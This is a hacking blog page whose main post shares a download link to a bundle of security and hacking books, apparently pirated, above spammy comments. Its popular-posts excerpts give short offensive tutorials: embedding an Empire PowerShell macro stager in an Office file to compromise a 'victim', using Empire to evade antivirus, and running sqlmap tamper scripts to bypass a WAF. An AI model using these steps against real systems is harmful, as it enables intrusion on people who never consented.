Skip to main content

[Resource Sharing] Best books collections for hacking

Today I'm gonna give away the best books collections  for hacking from my "library".

Below is the details of the collections(download link including):

  • Advanced Persistent Threat Hacking, The Art & Science
  • Attacking Network Protocols A Hacker’s Guide to Capture Analysis and Exploitation
  • Black_Hat_Python_Python_Programming_for_Hackers_and_Pentesters
  • Digital Forensics and Incident
  • Eldad_Eilam-Reversing__Secrets_of_Reverse_Engineering-Wiley(2005)
  • Fuzzing Brute Force Vulnerability Discovery
  • Google Hacking for Penetration Testers Volume2 - Nov 2007
  • Google_Hacking
  • Google.Hacking.Filters
  • Gray Hat Hacking The Ethical Hacker’s Handbook Fifth Edition
  • Gray Hat Python - Python Programming for Hackers and Reverse Engineers (2009)
  • Hacking Exposed 2.0 (Web) Best Book
  • Hacking Exposed Computer Forensics 2nd Edition
  • Hacking Exposed Linux, 3rd Edition
  • Hacking Exposed Mobile Security Secrets & Solutions
  • Hacking Exposed Unified Communications & VoIP, 2nd Edition
  • Hacking Exposed Web Applications, 3rd Edition
  • Hacking Exposed Windows, 3rd Edition
  • Hacking-Exposed-7-Network-Security-Secre-Stuart-McClure
  • iOS Penetration Testing
  • Kali_Linux_Assuring_Security_by_Penetration_Testing_Allen,_Lee
  • Kali.Linux.Wireless.Penetration.Testing
  • Kevin_Mitnick_-_The_Art_of_Deception
  • Learning IOS Penetration Testing_ Secure your iOS applications and uncover hidden vulnerabilities by conducting penetration tests
  • Learning Penetration Testing with Python
  • Malware Analyst's Cookbook and DVD
  • Mastering Linux Shell Scripting [eBook]
  • Mastering Wireless Penetration Testing for Highly Secured Environments-Ascetic_trip-[CPUL]
  • Mastering-Kali-Linux-for-Advanced-Penetration-Testing-Beggs-Robert
  • Mastering-Metasploit
  • Metsploit Unleashed
  • Packt.Burp.Suite.Essentials.Nov.2014.ISBN.1783550112
  • Packt.Mastering.Kali.Linux.For.Advanced.Penetration.Testing.Jun.2014.ISBN.1782163123
  • Penetration Testing - A hands-on introduction to Hacking
  • Practical Reverse Engineering
  • Practical_Malware_Analysis
  • Rootkits - Subverting the Windows Kernel
  • Social Engineering The Art of Human Hacking
  • sql-injection-attacks-and-defense
  • Syngress.Buffer.Overflow.Attacks
  • Syngress.Sockets.Shellcode.Porting.and.Coding
  • The Art of Memory Forensics
  • The Browser Hacker's Handbook
  • The Hacker Playbook 3 Practical Guide To Penetration Testing
  • The IDA Pro Book-2nd Edition-2011
  • The Tagled Web A Guide to Securing Modern Web Applications
  • the_mobile_hacker%27s_handbook
  • The-Hacker-Playbook-Practical-Guide-To-Penetration-Testing-2014
  • the-web-application-hackers-handbook
  • Web Penetration Testing with Kali Linux
  • web-hacking-101
  • Writing Security Tools & Exploits
  • Backtrack-5-wireless-penetration-testing
  • Violent Python - A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers
  • More
Download Link: https://miniurl.pw/Books

Comments

  1. Thanks, but link no more active? :(

    ReplyDelete

  2. Nice blog has been shared by you. before i read this blog i didn't have any knowledge about this but now i got some knowledge.
    so keep on sharing such kind of an interesting blogs.
    Ethical Hacking Training in Delhi

    ReplyDelete
  3. Thank you so much for such a well-written article. It’s full of insightful information.External Network Penetration Testing

    ReplyDelete
  4. hank you because you have been willing to share information with us. we will always appreciate all you have done here because I know you are very concerned with our.External Network Penetration Testing

    ReplyDelete
  5. This penetrating website
    is a treasure trove of valuable information, seamlessly combining user-friendly design with insightful content. A true digital gem!

    ReplyDelete
  6. Great post! Blog commenting is an acquired skill which depends on a couple of factors which are very well explained and articulated especially favourable circumstances to comment on blogs. Thanks and cheers!
    Digital Era

    ReplyDelete
  7. Nice blog has been shared by you. before I read this blog I didn't have any knowledge about this but now I got some knowledge.
    so keep on sharing such kind of an interesting blogs.hacker

    ReplyDelete

Post a Comment

Popular posts from this blog

Hack windows through Office file using powershell attack

[*] Hack windows through Office file using powershell attack [*] - You need to install Empire to create macro code (check video Config Empire ). - Config listener on empire:   ./empire  listeners  uselisteners http_com  set Name <listener_name>  set Port <listener_port>  execute   - Create macro code:    usestager windows/macro < listener_name >  set OutFile <Output_path>  execute - Embedded macro to Office file:   Word --> View --> Macro --> Copy your macro code. - Wait for victim run office file. => And you got a victim. [*] Video Demo: 

How to config and use Empire 2.0 to perform powershell attack

[*] How to config and use Empire 2.0 to perform powershell attack [*] [!] Note:  PowerShell can be run in memory where antivirus can’t see it, so it  obviously bypass antivirus. - Clone and install Empire.  git clone https://github.com/EmpireProject/Empire  cd Empire/setup  ./install.sh - How to use Listener.    ./empire  listeners  uselisteners <type_of_listener>  set Name <listener_name>  set Port <listener_port>  set DefaultDelay <delay_time>  info  execute - How to use stager.  main  usestager <stager_name> < listener_name >  info  [set <variable> <value>]  [info]  execute => Payload have been create. - Send payload to your victim. - Wait for victim run payload and get agents. - Interact with agent.  agents  interact <agents_name>  rename <agents_name_you_want>  usemodule <module_name>  execute Video Demo

Advanced Sqlmap - Metasploit for SQL Injection.

Advanced Sqlmap - Metasploit for SQL Injection. [?] What is SQL Injection? I'm not describe what is SQL Injection in this post, please check https://www.owasp.org/index.php/SQL_Injection [?] Why we use sqlmap? - This is a automatic SQL injection tool. - Provide many advanced technique that I'll show you in this post. - Open source and highly scalable. - Easy to install. [*] Sqlmap source https://github.com/sqlmapproject/sqlmap All you need is python 2.x and Internet connection: git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev [*] Well, now I'm gonna show you some advanced technique. [Bypass WAF using sqlmap tamper script] python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode --timeout=25 --time-sec=25 --random-agent --dbs You can also use more tamper script but it depend on your victim DBMS. ( use too much tamper script is not RECOMMEND ) Here is